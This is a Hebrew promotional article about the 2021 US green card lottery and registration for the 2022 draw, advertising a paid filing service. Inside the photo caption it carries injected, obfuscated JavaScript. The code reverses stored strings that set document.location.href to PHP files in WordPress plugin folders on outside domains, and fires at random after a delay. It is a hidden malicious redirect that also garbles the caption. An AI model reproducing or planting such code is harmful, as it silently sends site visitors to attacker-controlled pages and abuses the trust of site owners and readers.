fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

הגרלת הגרין קארד 2021

כמדי שנה, גם ב 2021 צפויה מחלקת ההגירה של ארצות הברית להוציא לדרך את הגרלת הגרין קארד השנתית, המהווה חלק מתכנית ה DV (Diversity Visa) – תכנית הגיוון של משרד ההגירה האמריקאי המעניקה מדי שנה גרין קארד לכחמישים אלף ברות וברי מזל מכל רחבי העולם.
הגרלת הגרין קארד 2021 | צילום: Depositpho$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos

לאחר מעל לשנה בהן המערכות הבירוקראטיות בעולם לא פעלו כבשגרה בעקבות מגפת הקורונה (וכתוצאה מכך היו שיבושים גם בהגרלת הגרין קארד של 2020), השנה אנחנו מקווים לראות את הכל חוזר לשגרה, פחות או יותר. מתי נערכה הגרלת הגרין קארד לשנת 2021, מתי צפויה ההגרלה הבאה ומתי/כיצד נרשמים אליה ומיהם הזוכים ברי המזל אשר בקרוב יורשו להגר לארצות הברית?

מועדים להגרלת הגרין קארד 2021 והגשת בקשות להגרלה של 2022

הגרלת הגרין קארד השנתית של 2021 נערכת סביב חודשים מאי – יוני השנה, כאשר את התוצאות יכולים המשתתפים בהגרלה לבדוק החל מהשישי ליוני. במקור התוצאות המלאות אמורות היו להתקבל ולהיות מדווחות כבר בתחילת מאי השנה, אך נדחו לשבוע הראשון של יוני. כך, עכשיו כבר יכול כל מי שהשתתף בהגרלת הגרין קארד ל 2021 לדעת האם זכה או לא, ומה עליו לעשות מכאן והלאה בכל אחד מן המקרים. למידע נוסף בנושא הקלק פה.

חשוב להבין כי המועדים להגשת בקשות להגרלת הגרין קארד של 2021 החלו כבר בשנה שעברה, כך שעכשיו כבר מאורח מדי עבור הגרלה זו (אשר כבר נערכה כאמור), אבל החדשות הטובות הן כי בקרוב כבר נפתחת ההרשמה הרשמית להגרלה הבאה, זו של 2022.

וזו נקודה שחשוב להפנים במידה ואתם מתעניינים בהשתתפות בהגרלת הגרין קארד – מאחר ומדובר בעניין גדול ומשמעותי, בסיכוי לזכות באישור הגירה ועבודה לארצות הברית, נדרשת גם הכנה והתייחסות מקדימה, כבר בשנה שלפני. עבור הגרלת הגרין קארד ל 2022, למשל, ניתן (ורצוי ביותר) להירשם ולהגיש את הבקשה כבר בתחילת אוקטובר הקרוב.

מאחר ומדובר בטופס בקשה מורכב יחסית, מומלץ להתחיל לעבוד עליו כבר עכשיו, עוד בקיץ והרבה לפני הגעתו של מועד ההגשה.

את ההגשה להגרלת הגרין קארד, בפרט זו של השנה הבאה, מומלץ כמובן להגיש דרך חברה המתמחה בהגרלות ובהגשת בקשות לוויזה לארה"ב, דוגמת השירות שאנחנו מציעים. כך מתקבלים סיכויי ההצלחה הגבוהים ביותר, שכן אנו דואגים לחסל את כל הטעויות והדברים הקטנים שעלולים להכשיל אתכם (ואכן מכשילים בפועל לא מעט בקשות), ולהגיש את הבקשה שלכם באופן מושלם אשר ימקסם את סיכוייכם לעלות בגורל ולזכות בגרין קארד המיוחל.

הגרלת גרין קארד 2021 – האם זכיתם?

מיהם הזוכים המאושרים של הגרלת הגרין קארד לשנת 2021? ובכן, הרשימה כבר אמורה להיות מפורסמת כך שכל מי שהשתתף בהגרלה יכול לבדוק באופן רשמי האם זכה או לא. כמובן שמי שהגיש את הבקשה שלו דרכנו יקבל עדכון גם מאיתנו, שכן אנו מלווים את הניגשים להגרלה לכל אורך התהליך, כולל כמובן גם בשלבים שלאחר הזכייה. וזו נקודה שחשוב לדעת ולהפנים – גם לאחר שזוכים בהגרלה העבדה עדיין לא תמה – יש להמשיך למלא את הטפסים הנדרשים ולעמוד בדרישות הבירוקראטיות השונות על מנת להמשיך ולהתקדם בתהליך, ולממש את הזכות לגרין קארד בה זכיתם.

ההגרלה של 2021 הייתה מאתגרת עוד יותר מהרגיל מבחינה בירוקראטית, בין השאר בגלל העיכובים, הדחיות וחוסר הוודאות שבעקבות ההתמודדות עם מגפת הקורונה. עם זאת, אינספור אנשים בכל זאת השתתפו בהגרלה ועשרות אלפים זכו בה, ויוכלו להתחיל בקרוב את חייהם החדשים בארץ האפשרויות הבלתי מוגבלות. בין אם השתתפתם ולא זכיתם ובין אם לא השתתפתם כלל, זה יכול לקרות גם עבורכם בהגרלה של 2022.

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות